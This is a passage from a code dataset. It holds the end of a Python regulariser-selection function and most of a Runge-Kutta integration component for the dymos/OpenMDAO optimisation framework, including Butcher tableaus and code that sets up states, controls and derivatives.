ValueError(\"Argument error: the thresholding_function argument must be a function\")\n thresholding_fun = thresholding_function\n \n elif type(regulariser_function) == type(\"str\"): # if regulariser function is specified as a string\n regulariser_str = regulariser_function.lower()\n \n if regulariser_str == \"l1\":\n thresholding_fun = soft_threshold_l1\n regulariser_fun = lambda x: regulariser * reg_l1(x)\n \n elif regulariser_str == 'iso_tv' or regulariser_str == 'tv':\n thresholding_fun = soft_threshold_iso_tv\n regulariser_fun = lambda x: regulariser * reg_iso_tv(x)\n \n else:\n raise ValueError(\"Argument error: Unknown regulariser %s\" % regulariser_str)\n \n return regulariser_fun, thresholding_fun\n","sub_path":"anoa/algorithms.py","file_name":"algorithms.py","file_ext":"py","file_size_in_byte":18398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
+{"seq_id":"45004878","text":"import numpy as np\nimport openmdao.api as om\n\nfrom ...options import options as dymos_options\n\nfrom .ode_evaluation_group import ODEEvaluationGroup\nfrom ...utils.misc import get_rate_units\nfrom ...utils.introspection import filter_outputs, classify_var\n\n\nrk_methods = {'rk4': {'a': np.array([[0.0, 0.0, 0.0, 0.0],\n [0.5, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.0, 0.0],\n [0.0, 0.0, 1.0, 0.0]]),\n 'b': np.array([1/6, 1/3, 1/3, 1/6]),\n 'c': np.array([0, 1/2, 1/2, 1])},\n\n '3/8': {'a': np.array([[0.0, 0.0, 0.0, 0.0],\n [1/3, 0.0, 0.0, 0.0],\n [-1/3, 1.0, 0.0, 0.0],\n [1.0, -1.0, 1.0, 0.0]]),\n 'b': np.array([1/8, 3/8, 3/8, 1/8]),\n 'c': np.array([0, 1/3, 2/3, 1])},\n\n 'euler': {'a': np.array([[0.0]]),\n 'b': np.array([1.0]),\n 'c': np.array([0.0])},\n\n 'ralston': {'a': np.array([[0, 0], [2/3, 0]]),\n 'c': np.array([0, 2/3]),\n 'b': np.array([1/4, 3/4])},\n\n 'rkf': {'a': np.array([[0, 0, 0, 0, 0],\n [1/4, 0, 0, 0, 0],\n [3/32, 9/32, 0, 0, 0],\n [1932/2197, -7200/2197, 7296/2197, 0, 0],\n [439/216, -8, 3680/513, -845/4104, 0],\n [-8/27, 2, -3544/2565, 1859/4104, -11/40]]),\n 'c': np.array([0, 1/4, 3/8, 12/13, 1, 1/2]),\n 'b': np.array([16/135, 0, 6656/12825, 28561/56430, -9/50, 2/55]),\n 'b_star': np.array([25/216, 0, 1408/2565, 2197/4104, -1/5, 0])},\n\n 'rkck': {'a': np.array([[0, 0, 0, 0, 0],\n [1/5, 0, 0, 0, 0],\n [3/40, 9/40, 0, 0, 0],\n [3/10, -9/10, 6/5, 0, 0],\n [-11/54, 5/2, -70/27, 35/27, 0],\n [1631/55296, 175/512, 575/13828, 44275/110592, 253/4096]]),\n 'c': np.array([0, 1/5, 3/10, 3/5, 1, 7/8]),\n 'b': np.array([2825/27648, 0, 18575/48384, 13525/55296, 277/14336, 1/4]),\n 'b_star': np.array([37/378, 0, 250/621, 125/594, 512/1771, 0])},\n\n 'dopri': {'a': np.array([[0, 0, 0, 0, 0, 0],\n [1/5, 0, 0, 0, 0, 0],\n [3/40, 9/40, 0, 0, 0, 0],\n [44/45, -56/15, 32/9, 0, 0, 0],\n [19372/6561, -25360/2187, 64448/6561, -212/729, 0, 0],\n [9017/3168, -355/33, 46732/5247, 49/176, -5103/18656, 0],\n [35/384, 0, 500/1113, 125/192, -2187/6784, 11/84]]),\n 'c': np.array([0, 1/5, 3/10, 4/5, 8/9, 1, 1]),\n 'b': np.array([35/384, 0, 500/1113, 125/192, -2187/6784, 11/84, 0]),\n 'b_star': np.array([5179/57600, 0, 7571/16695, 393/640, -92097/339200, 187/2100, 1/40])}\n }\n\n\nclass RKIntegrationComp(om.ExplicitComponent):\n \"\"\"\n A component to perform explicit integration using a generic Runge-Kutta scheme.\n\n This component contains a sub-Problem with a component that will be solved over num_nodes\n points instead of creating num_nodes instances of that same component and connecting them\n together.\n\n Parameters\n ----------\n ode_class : class\n The class of the OpenMDAO system to be used to evaluate the ODE in this Group.\n time_options : OptionsDictionary\n OptionsDictionary of time options.\n state_options : dict of {str: OptionsDictionary}\n For each state variable, a dictionary of its options, keyed by name.\n parameter_options : dict of {str: OptionsDictionary}\n For each parameter, a dictionary of its options, keyed by name.\n control_options : dict of {str: OptionsDictionary}\n For each control variable, a dictionary of its options, keyed by name.\n polynomial_control_options : dict of {str: OptionsDictionary}\n For each polynomial variable, a dictionary of its options, keyed by name.\n timeseries_options : dict\n The timeseries options associated with the parent phase. This is used to access\n requested timeseries outputs. 
Some options regarding timeseries are not applicable\n to the RungeKutta integration.\n complex_step_mode : bool\n If True, allocate internal memory as complex to support complex-step differentiation.\n grid_data : GridData\n The GridData instance pertaining to the phase to which this ODEEvaluationGroup belongs.\n standalone_mode : bool\n When True, this component will perform its configuration during setup. This is useful\n for unittesting this component when not embedded in a larger system.\n **kwargs : dict\n Additional keyword arguments passed to Group.\n \"\"\"\n def __init__(self, ode_class, time_options=None,\n state_options=None, parameter_options=None, control_options=None,\n polynomial_control_options=None, timeseries_options=None, complex_step_mode=False,\n grid_data=None, standalone_mode=True, **kwargs):\n super().__init__(**kwargs)\n self.ode_class = ode_class\n self.time_options = time_options\n self.state_options = state_options\n self.parameter_options = parameter_options or {}\n self.control_options = control_options or {}\n self.polynomial_control_options = polynomial_control_options or {}\n self.timeseries_options = timeseries_options or {}\n self._prob = None\n self._complex_step_mode = complex_step_mode\n self._grid_data = grid_data\n self._TYPE = complex if complex_step_mode else float\n\n self.x_size = 0\n self.p_size = 0\n self.u_size = 0\n self.up_size = 0\n self.theta_size = 0\n self.Z_size = 0\n\n self._totals_of_names = []\n self._totals_wrt_names = []\n\n # If _standalone_mode is True, this component will fully perform all of its setup at setup\n # time. If False, it will need to have configure_io called on it to properly finish its\n # setup.\n self._standalone_mode = standalone_mode\n self._no_check_partials = not dymos_options['include_check_partials']\n\n def initialize(self):\n \"\"\"\n Declare options for the RKIntegrationComp.\n \"\"\"\n self.options.declare('method', types=(str,), default='rk4',\n desc='The explicit Runge-Kutta scheme to use. 
One of' +\n str(list(rk_methods.keys())))\n self.options.declare('num_steps_per_segment', types=(int,), default=10)\n self.options.declare('ode_init_kwargs', types=dict, allow_none=True, default=None)\n\n def _setup_subprob(self):\n self._prob = p = om.Problem(comm=self.comm)\n p.model.add_subsystem('ode_eval',\n ODEEvaluationGroup(self.ode_class, self.time_options,\n self.state_options,\n self.parameter_options,\n self.control_options,\n self.polynomial_control_options,\n ode_init_kwargs=self.options['ode_init_kwargs'],\n grid_data=self._grid_data),\n promotes_inputs=['*'],\n promotes_outputs=['*'])\n\n p.setup(force_alloc_complex=self._complex_step_mode)\n p.final_setup()\n self._prob.set_complex_step_mode(self._complex_step_mode)\n\n def _setup_time(self):\n if self._standalone_mode:\n self._configure_time_io()\n\n def _configure_time_io(self):\n num_output_rows = self._num_output_rows\n\n self._totals_of_names.append('time')\n self._totals_wrt_names.extend(['time', 't_initial', 't_duration'])\n\n self.add_input('t_initial', shape=(1,), units=self.time_options['units'])\n self.add_input('t_duration', shape=(1,), units=self.time_options['units'])\n self.add_output('t_final', shape=(1,), units=self.time_options['units'])\n self.add_output('time', shape=(num_output_rows, 1), units=self.time_options['units'])\n self.add_output('time_phase', shape=(num_output_rows, 1), units=self.time_options['units'])\n\n self.declare_partials('t_final', 't_initial', val=1.0)\n self.declare_partials('t_final', 't_duration', val=1.0)\n self.declare_partials('time', 't_initial', val=1.0)\n self.declare_partials('time', 't_duration', val=1.0)\n self.declare_partials('time_phase', 't_duration', val=1.0)\n\n def _setup_states(self):\n if self._standalone_mode:\n self._configure_states_io()\n\n def _configure_states_io(self):\n num_output_rows = self._num_output_rows\n\n # The total size of the entire state vector\n self.x_size = 0\n\n self._state_input_names = {}\n self._state_output_names = {}\n\n # The indices of each state in x\n self.state_idxs = {}\n\n # The indices of each state's initial value in Z\n self._state_idxs_in_Z = {}\n\n for state_name, options in self.state_options.items():\n self._state_input_names[state_name] = f'states:{state_name}'\n self._state_output_names[state_name] = f'states_out:{state_name}'\n\n self._totals_of_names.append(f'state_rate_collector.state_rates:{state_name}_rate')\n self._totals_wrt_names.append(self._state_input_names[state_name])\n\n self.add_input(self._state_input_names[state_name],\n shape=options['shape'],\n units=options['units'],\n desc=f'initial value of state {state_name}')\n self.add_output(self._state_output_names[state_name],\n shape=(num_output_rows,) + options['shape'],\n units=options['units'],\n desc=f'final value of state {state_name}')\n\n state_size = np.prod(options['shape'], dtype=int)\n\n # The indices of the state in x\n self.state_idxs[state_name] = np.s_[self.x_size:self.x_size + state_size]\n self.x_size += state_size\n\n self.declare_partials(of=self._state_output_names[state_name],\n wrt='t_initial')\n\n self.declare_partials(of=self._state_output_names[state_name],\n wrt='t_duration')\n\n for state_name_wrt in self.state_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'states:{state_name_wrt}')\n\n for param_name_wrt in self.parameter_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'parameters:{param_name_wrt}')\n\n for control_name_wrt in self.control_options:\n 
self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'controls:{control_name_wrt}')\n\n for control_name_wrt in self.polynomial_control_options:\n self.declare_partials(of=self._state_output_names[state_name],\n wrt=f'polynomial_controls:{control_name_wrt}')\n\n def _setup_parameters(self):\n if self._standalone_mode:\n self._configure_parameters_io()\n\n def _configure_parameters_io(self):\n # The indices of each parameter in p\n self.p_size = 0\n self.parameter_idxs = {}\n self._parameter_idxs_in_theta = {}\n self._parameter_idxs_in_Z = {}\n self._param_input_names = {}\n\n for param_name, options in self.parameter_options.items():\n self._param_input_names[param_name] = f'parameters:{param_name}'\n self._totals_wrt_names.append(self._param_input_names[param_name])\n\n self.add_input(self._param_input_names[param_name],\n shape=options['shape'],\n val=options['val'],\n units=options['units'],\n desc=f'value for parameter {param_name}')\n\n param_size = np.prod(options['shape'], dtype=int)\n self.parameter_idxs[param_name] = np.s_[self.p_size:self.p_size+param_size]\n self.p_size += param_size\n\n def _setup_controls(self):\n if self._standalone_mode:\n self._configure_controls_io()\n\n def _configure_controls_io(self):\n self.u_size = 0\n self.control_idxs = {}\n self._control_idxs_in_theta = {}\n self._control_idxs_in_Z = {}\n self._control_idxs_in_y = {}\n self._control_rate_idxs_in_y = {}\n self._control_rate2_idxs_in_y = {}\n self._control_input_names = {}\n self._control_output_names = {}\n self._control_rate_names = {}\n self._control_rate2_names = {}\n\n num_output_rows = self._num_output_rows\n\n if self.control_options:\n time_units = self.time_options['units']\n control_input_node_ptau = self._grid_data.node_ptau[\n self._grid_data.subset_node_indices['control_input']]\n\n for control_name, options in self.control_options.items():\n control_param_shape = (len(control_input_node_ptau),) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n self._control_input_names[control_name] = f'controls:{control_name}'\n self._control_output_names[control_name] = f'control_values:{control_name}'\n self._control_rate_names[control_name] = f'control_rates:{control_name}_rate'\n self._control_rate2_names[control_name] = f'control_rates:{control_name}_rate2'\n\n self._totals_wrt_names.append(self._control_input_names[control_name])\n self._totals_of_names.append(self._control_output_names[control_name])\n self._totals_of_names.append(self._control_rate_names[control_name])\n self._totals_of_names.append(self._control_rate2_names[control_name])\n\n self.add_input(self._control_input_names[control_name],\n shape=control_param_shape,\n units=options['units'],\n desc=f'values for control {control_name} at input nodes')\n\n self.add_output(self._control_output_names[control_name],\n shape=(num_output_rows,) + options['shape'],\n units=options['units'],\n desc=f'values for control {control_name} at output nodes')\n\n self.add_output(self._control_rate_names[control_name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=1),\n desc=f'values for rate of control {control_name} at output nodes')\n\n self.add_output(self._control_rate2_names[control_name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=2),\n desc=f'values for second derivative rate of control {control_name} at output nodes')\n\n 
self.declare_partials(of=self._control_output_names[control_name],\n wrt=self._control_input_names[control_name],\n val=1.0)\n\n self.declare_partials(of=self._control_rate_names[control_name],\n wrt=self._control_input_names[control_name],\n val=1.0)\n\n self.declare_partials(of=self._control_rate2_names[control_name],\n wrt=self._control_input_names[control_name],\n val=1.0)\n\n self.declare_partials(of=self._control_rate_names[control_name],\n wrt='t_duration',\n val=1.0)\n\n self.declare_partials(of=self._control_rate2_names[control_name],\n wrt='t_duration',\n val=1.0)\n\n self.control_idxs[control_name] = np.s_[self.u_size:self.u_size+control_param_size]\n self.u_size += control_param_size\n\n def _configure_polynomial_controls_io(self):\n self.up_size = 0\n self.polynomial_control_idxs = {}\n self._polynomial_control_idxs_in_theta = {}\n self._polynomial_control_idxs_in_Z = {}\n self._polynomial_control_input_names = {}\n self._polynomial_control_output_names = {}\n self._polynomial_control_rate_names = {}\n self._polynomial_control_rate2_names = {}\n self._polynomial_control_idxs_in_y = {}\n self._polynomial_control_rate_idxs_in_y = {}\n self._polynomial_control_rate2_idxs_in_y = {}\n\n num_output_rows = self._num_output_rows\n time_units = self.time_options['units']\n\n for name, options in self.polynomial_control_options.items():\n num_input_nodes = options['order'] + 1\n control_param_shape = (num_input_nodes,) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n\n self._polynomial_control_input_names[name] = f'polynomial_controls:{name}'\n self._polynomial_control_output_names[name] = f'polynomial_control_values:{name}'\n self._polynomial_control_rate_names[name] = f'polynomial_control_rates:{name}_rate'\n self._polynomial_control_rate2_names[name] = f'polynomial_control_rates:{name}_rate2'\n\n self._totals_wrt_names.append(self._polynomial_control_input_names[name])\n self._totals_of_names.append(self._polynomial_control_output_names[name])\n self._totals_of_names.append(self._polynomial_control_rate_names[name])\n self._totals_of_names.append(self._polynomial_control_rate2_names[name])\n\n self.add_input(self._polynomial_control_input_names[name],\n shape=control_param_shape,\n units=options['units'],\n desc=f'values for control {name} at input nodes')\n\n self.add_output(self._polynomial_control_output_names[name],\n shape=(num_output_rows,) + options['shape'],\n units=options['units'],\n desc=f'values for control {name} at output nodes')\n\n self.add_output(self._polynomial_control_rate_names[name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=1),\n desc=f'values for rate of control {name} at output nodes')\n\n self.add_output(self._polynomial_control_rate2_names[name],\n shape=(num_output_rows,) + options['shape'],\n units=get_rate_units(options['units'], time_units, deriv=2),\n desc=f'values for second derivative rate of control {name} at output nodes')\n\n self.declare_partials(of=self._polynomial_control_output_names[name],\n wrt=self._polynomial_control_input_names[name],\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate_names[name],\n wrt=self._polynomial_control_input_names[name],\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate2_names[name],\n wrt=self._polynomial_control_input_names[name],\n val=1.0)\n\n self.declare_partials(of=self._polynomial_control_rate_names[name],\n wrt='t_duration',\n val=1.0)\n\n 
self.declare_partials(of=self._polynomial_control_rate2_names[name],\n wrt='t_duration',\n val=1.0)\n\n self.polynomial_control_idxs[name] = np.s_[self.up_size:self.up_size+control_param_size]\n self.up_size += control_param_size\n\n def _setup_timeseries(self):\n if self._standalone_mode:\n self._configure_timeseries_outputs()\n\n def _configure_timeseries_outputs(self):\n \"\"\"\n Creates a mapping of {output_name : {'path': str, 'units': str, 'shape': tuple, 'idxs_in_y': numpy.Indexer}}.\n\n This mapping is used to determine which variables of the ODE need to be saved in the\n algebraic outputs (y) due to being requested as timeseries outputs.\n \"\"\"\n num_output_rows = self._num_output_rows\n ode_eval = self._prob.model._get_subsystem('ode_eval.ode')\n\n self._timeseries_output_names = {}\n self._timeseries_idxs_in_y = {}\n self._filtered_timeseries_outputs = {}\n\n for ts_name, ts_opts in self.timeseries_options.items():\n patterns = list(ts_opts['outputs'].keys())\n matching_outputs = filter_outputs(patterns, ode_eval)\n\n explicit_requests = set([key for key in\n self.timeseries_options[ts_name]['outputs'].keys()\n if '*' not in key])\n\n unmatched_requests = sorted(list(set(explicit_requests) - set(matching_outputs.keys())))\n\n if unmatched_requests:\n om.issue_warning(msg='The following timeseries outputs were requested but '\n f'not found in the ODE: {\", \".join(unmatched_requests)}',\n category=om.OpenMDAOWarning)\n\n for var, var_meta in matching_outputs.items():\n if var in self.timeseries_options[ts_name]['outputs']:\n ts_var_options = self.timeseries_options[ts_name]['outputs'][var]\n # var explicitly matched\n output_name = ts_var_options['output_name'] if ts_var_options['output_name'] else var.split('.')[-1]\n units = ts_var_options.get('units', None) or var_meta.get('units', None)\n shape = var_meta['shape']\n else:\n # var matched via wildcard\n output_name = var.split('.')[-1]\n units = var_meta['units']\n shape = var_meta['shape']\n\n if output_name in self._filtered_timeseries_outputs:\n raise ValueError(f\"Requested timeseries output {var} matches multiple output names \"\n f\"within the ODE. 
Use `.add_timeseries_output({var}, \"\n f\"output_name=)' to disambiguate the timeseries name.\")\n\n self._filtered_timeseries_outputs[output_name] = {'path': f'ode_eval.ode.{var}',\n 'units': units,\n 'shape': shape}\n\n ode_eval.add_constraint(var)\n\n self._timeseries_output_names[output_name] = f'timeseries:{output_name}'\n self._totals_of_names.append(self._filtered_timeseries_outputs[output_name]['path'])\n\n self.add_output(self._timeseries_output_names[output_name],\n shape=(num_output_rows,) + shape,\n units=units,\n desc=f'values for timeseries output {output_name} at output nodes')\n\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt='t_initial')\n\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt='t_duration')\n\n for state_name_wrt in self.state_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._state_input_names[state_name_wrt])\n\n for param_name_wrt in self.parameter_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._param_input_names[param_name_wrt])\n\n for control_name_wrt in self.control_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._control_input_names[control_name_wrt])\n\n for control_name_wrt in self.polynomial_control_options:\n self.declare_partials(of=self._timeseries_output_names[output_name],\n wrt=self._polynomial_control_input_names[control_name_wrt])\n\n def _setup_storage(self):\n if self._standalone_mode:\n self._configure_storage()\n\n def _configure_storage(self):\n gd = self._grid_data\n control_input_node_ptau = gd.node_ptau[gd.subset_node_indices['control_input']]\n\n # allocate the ODE parameter vector\n self.theta_size = 2 + self.p_size + self.u_size + self.up_size\n\n # allocate the integration parameter vector\n self.Z_size = self.x_size + self.theta_size\n\n # allocate the algebraic outputs vector\n self.y_size = 3 * self.u_size\n\n start_Z = 0\n for state_name, options in self.state_options.items():\n state_size = np.prod(options['shape'], dtype=int)\n self._state_idxs_in_Z[state_name] = np.s_[start_Z: start_Z+state_size]\n start_Z += state_size\n\n start_Z = self.x_size + 2\n start_theta = 2\n for param_name, options in self.parameter_options.items():\n param_size = np.prod(options['shape'], dtype=int)\n self._parameter_idxs_in_Z[param_name] = np.s_[start_Z: start_Z+param_size]\n self._parameter_idxs_in_theta[param_name] = np.s_[start_theta: start_theta+param_size]\n start_Z += param_size\n start_theta += param_size\n\n start_Z = self.x_size + 2 + self.p_size\n start_theta = 2 + self.p_size\n start_y = 0\n for control_name, options in self.control_options.items():\n control_size = np.prod(options['shape'], dtype=int)\n control_param_shape = (len(control_input_node_ptau),) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n self._control_idxs_in_Z[control_name] = np.s_[start_Z:start_Z+control_param_size]\n self._control_idxs_in_theta[control_name] = np.s_[start_theta:start_theta+control_param_size]\n self._control_idxs_in_y[control_name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._control_rate_idxs_in_y[control_name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._control_rate2_idxs_in_y[control_name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n start_Z += control_param_size\n start_theta += control_param_size\n\n start_Z = self.x_size + 2 + self.p_size + 
self.u_size\n start_theta = 2 + self.p_size + self.u_size\n for name, options in self.polynomial_control_options.items():\n control_size = np.prod(options['shape'], dtype=int)\n num_input_nodes = options['order'] + 1\n control_param_shape = (num_input_nodes,) + options['shape']\n control_param_size = np.prod(control_param_shape, dtype=int)\n self._polynomial_control_idxs_in_Z[name] = np.s_[start_Z:start_Z+control_param_size]\n self._polynomial_control_idxs_in_theta[name] = np.s_[start_theta:start_theta+control_param_size]\n self._polynomial_control_idxs_in_y[name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._polynomial_control_rate_idxs_in_y[name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n self._polynomial_control_rate2_idxs_in_y[name] = np.s_[start_y:start_y+control_size]\n start_y += control_size\n start_Z += control_param_size\n start_theta += control_param_size\n\n for output_name, options in self._filtered_timeseries_outputs.items():\n size = np.prod(options['shape'], dtype=int)\n self._timeseries_idxs_in_y[output_name] = np.s_[start_y:start_y+size]\n start_y += size\n\n N = self.options['num_steps_per_segment']\n rk = rk_methods[self.options['method']]\n num_rows = self._num_rows\n num_stages = len(rk['b'])\n num_x = self.x_size\n num_theta = self.theta_size\n num_z = num_x + num_theta\n num_y = self.y_size = start_y\n\n # The contiguous vector of state values\n self._x = np.zeros((num_rows, self.x_size, 1), dtype=self._TYPE)\n\n # The contiguous vector of time values\n self._t = np.zeros((num_rows, 1), dtype=self._TYPE)\n\n # The contiguous vector of ODE parameter values\n self._theta = np.zeros((self.theta_size, 1), dtype=self._TYPE)\n\n # The contiguous vector of state rates\n self._f = np.zeros((self.x_size, 1), dtype=self._TYPE)\n\n # The contiguous vector of ODE algebraic outputs\n self._y = np.zeros((num_rows, num_y, 1), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current time\n self._f_t = np.zeros((self.x_size, 1), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current state\n self._f_x = np.zeros((self.x_size, self.x_size), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the parameters\n self._f_theta = np.zeros((self.x_size, self.theta_size), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current time\n self._y_t = np.zeros((self.y_size, 1), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the current state\n self._y_x = np.zeros((self.y_size, self.x_size), dtype=self._TYPE)\n\n # The derivatives of the state rates wrt the parameters\n self._y_theta = np.zeros((self.y_size, self.theta_size), dtype=self._TYPE)\n\n # Intermediate state rate storage\n self._k_q = np.zeros((num_stages, self.x_size, 1), dtype=self._TYPE)\n\n # The partial derivative of the final state vector wrt time from state update equation.\n self.px_pt = np.zeros((self.x_size, 1), dtype=self._TYPE)\n\n # The partial derivative of the final state vector wrt the initial state vector from the\n # state update equation.\n self.px_px = np.zeros((self.x_size, self.x_size), dtype=self._TYPE)\n\n # Derivatives pertaining to the stage ODE evaluations\n self._dTi_dZ = np.zeros((1, num_z), dtype=self._TYPE)\n self._dXi_dZ = np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dkq_dZ = np.zeros((num_stages, num_x, num_z), dtype=self._TYPE)\n\n # The ODE parameter derivatives wrt the integration parameters\n self._dtheta_dZ = np.zeros((num_theta, num_z), dtype=self._TYPE)\n 
self._dtheta_dZ[:, num_x:] = np.eye(num_theta, dtype=self._TYPE)\n\n # Total derivatives of evolving quantities (x, t, h) wrt the integration parameters.\n # Let Z be [x0.ravel() t0 tp p.ravel() u.ravel()]\n self._dx_dZ = np.zeros((num_rows, num_x, num_z), dtype=self._TYPE)\n self._dx_dZ[:, :, :num_x] = np.eye(num_x, dtype=self._TYPE)\n self._dt_dZ = np.zeros((num_rows, 1, num_z), dtype=self._TYPE)\n self._dt_dZ[:, 0, num_x] = 1.0\n self._dh_dZ = np.zeros((num_rows, 1, num_z), dtype=self._TYPE)\n self._dh_dZ[:, 0, num_x+1] = 1.0 / N\n\n # Total derivatives of ODE outputs (y) wrt the integration parameters.\n self._dy_dZ = np.zeros((num_rows, num_y, num_z), dtype=self._TYPE)\n\n def setup(self):\n \"\"\"\n Add the necessary I/O and storage for the RKIntegrationComp.\n \"\"\"\n gd = self._grid_data\n N = self.options['num_steps_per_segment']\n\n # Indices to map the rows to output rows\n temp = np.zeros((gd.num_segments, N+1))\n temp[:, 0] = 1\n temp[:, -1] = 1\n self._output_src_idxs = np.where(temp.ravel() == 1)[0]\n\n self._num_output_rows = gd.num_segments * 2\n self._num_rows = gd.num_segments * (N + 1)\n\n self._totals_of_names = []\n self._totals_wrt_names = []\n\n self._setup_subprob()\n self._setup_time()\n self._setup_parameters()\n self._setup_controls()\n self._setup_states()\n self._setup_timeseries()\n self._setup_storage()\n\n def _reset_derivs(self):\n \"\"\"\n Reset the value of total derivatives prior to propagation.\n \"\"\"\n N = self.options['num_steps_per_segment']\n num_x = self.x_size\n num_theta = self.theta_size\n\n # Let Z be [x0.ravel() t0 tp p.ravel() u.ravel()]\n self._dx_dZ[...] = 0.0 # np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dx_dZ[0, :, :num_x] = np.eye(num_x, dtype=self._TYPE)\n self._dt_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dt_dZ[0, 0, num_x] = 1.0\n self._dh_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dh_dZ[:, 0, num_x+1] = 1.0 / N\n self._dTi_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dXi_dZ[...] = 0.0 # np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dkq_dZ[...] = 0.0 # np.zeros((num_stages, num_x, num_z), dtype=self._TYPE)\n self._dtheta_dZ[...] = 0.0 # np.zeros((num_theta, num_z), dtype=self._TYPE)\n self._dtheta_dZ[:, num_x:] = np.eye(num_theta, dtype=self._TYPE)\n\n def _initialize_segment(self, row, inputs=None, derivs=False):\n \"\"\"\n Set the derivatives at the current row to those of the previous row.\\\n\n This is used to continue the value of derivatives over a segment boundary.\n \"\"\"\n if row == 0:\n # start x, t, and h\n for state_name in self.state_options:\n i_name = self._state_input_names[state_name]\n self._x[0, self.state_idxs[state_name], 0] = inputs[i_name].ravel()\n self._t[0, 0] = inputs['t_initial'].copy()\n\n if derivs:\n self._reset_derivs()\n else:\n # copy last x, t, h\n self._x[row, ...] = self._x[row-1, ...]\n self._t[row, ...] = self._t[row-1, ...]\n\n if derivs:\n # The 3 arrays of propagated derivatives need to copy over previous values\n self._dx_dZ[row, ...] = self._dx_dZ[row-1, ...]\n self._dt_dZ[row, ...] = self._dt_dZ[row-1, ...]\n self._dh_dZ[row, ...] = self._dh_dZ[row-1, ...]\n\n # Derivatives of the internal calls are just reset\n self._dTi_dZ[...] = 0.0 # np.zeros((1, num_z), dtype=self._TYPE)\n self._dXi_dZ[...] = 0.0 # np.zeros((num_x, num_z), dtype=self._TYPE)\n self._dkq_dZ[...] = 0.0 # np.zeros((num_stages, num_x, num_z), dtype=self._TYPE)\n\n # dtheta_dZ remains constant across segments\n # self._dtheta_dZ[...] 
= 0.0 # np.zeros((num_theta, num_z), dtype=self._TYPE)\n # self._dtheta_dZ[:, num_x:] = np.eye(num_theta, dtype=self._TYPE)\n\n def eval_f(self, x, t, theta, f, y=None):\n \"\"\"\n Evaluate the ODE which provides the state rates for integration.\n\n Parameters\n ----------\n x : np.ndarray\n A flattened, contiguous vector of the state values.\n t : float\n The current time of the integration.\n theta : np.ndarray\n A flattened, contiguous vector of the ODE parameter values.\n f : np.ndarray\n A flattened, contiguous vector of the state rates.\n y : np.ndarray or None\n A flattened, contiguous vector of the auxiliary ODE outputs, if desired.\n If present, the first positions are reserved for the contiguous control values, rates,\n and second derivatives, respectively. The remaining elements are the requested ODE-based\n timeseries outputs.\n \"\"\"\n # transcribe time\n self._prob.set_val('time', t, units=self.time_options['units'])\n self._prob.set_val('t_initial', theta[0], units=self.time_options['units'])\n self._prob.set_val('t_duration', theta[1], units=self.time_options['units'])\n\n # transcribe states\n for name in self.state_options:\n self._prob.set_val(self._state_input_names[name], x[self.state_idxs[name], 0])\n\n # transcribe parameters\n for name in self.parameter_options:\n self._prob.set_val(self._param_input_names[name], theta[self._parameter_idxs_in_theta[name]])\n\n # transcribe controls\n for name in self.control_options:\n self._prob.set_val(self._control_input_names[name], theta[self._control_idxs_in_theta[name]])\n\n # transcribe polynomial controls\n for name in self.polynomial_control_options:\n self._prob.set_val(self._polynomial_control_input_names[name],\n theta[self._polynomial_control_idxs_in_theta[name]])\n\n # execute the ODE\n self._prob.run_model()\n\n # pack the resulting array\n for name in self.state_options:\n f[self.state_idxs[name]] = self._prob.get_val(f'state_rate_collector.state_rates:{name}_rate').ravel()\n\n if y is not None:\n # pack any control values and rates into y\n for name in self.control_options:\n output_name = self._control_output_names[name]\n rate_name = self._control_rate_names[name]\n rate2_name = self._control_rate2_names[name]\n y[self._control_idxs_in_y[name]] = self._prob.get_val(output_name).ravel()\n y[self._control_rate_idxs_in_y[name]] = self._prob.get_val(rate_name).ravel()\n y[self._control_rate2_idxs_in_y[name]] = self._prob.get_val(rate2_name).ravel()\n\n # pack any polynomial control values and rates into y\n for name in self.polynomial_control_options:\n output_name = self._polynomial_control_output_names[name]\n rate_name = self._polynomial_control_rate_names[name]\n rate2_name = self._polynomial_control_rate2_names[name]\n y[self._polynomial_control_idxs_in_y[name]] = self._prob.get_val(output_name).ravel()\n y[self._polynomial_control_rate_idxs_in_y[name]] = self._prob.get_val(rate_name).ravel()\n y[self._polynomial_control_rate2_idxs_in_y[name]] = self._prob.get_val(rate2_name).ravel()\n\n # pack any polynomial control values and rates into y\n\n for output_name, options in self._filtered_timeseries_outputs.items():\n path = options['path']\n y[self._timeseries_idxs_in_y[output_name]] = self._prob.get_val(path).ravel()\n\n def eval_f_derivs(self, x, t, theta, f_x, f_t, f_theta, y_x=None, y_t=None, y_theta=None):\n \"\"\"\n Evaluate the derivative of the ODE output 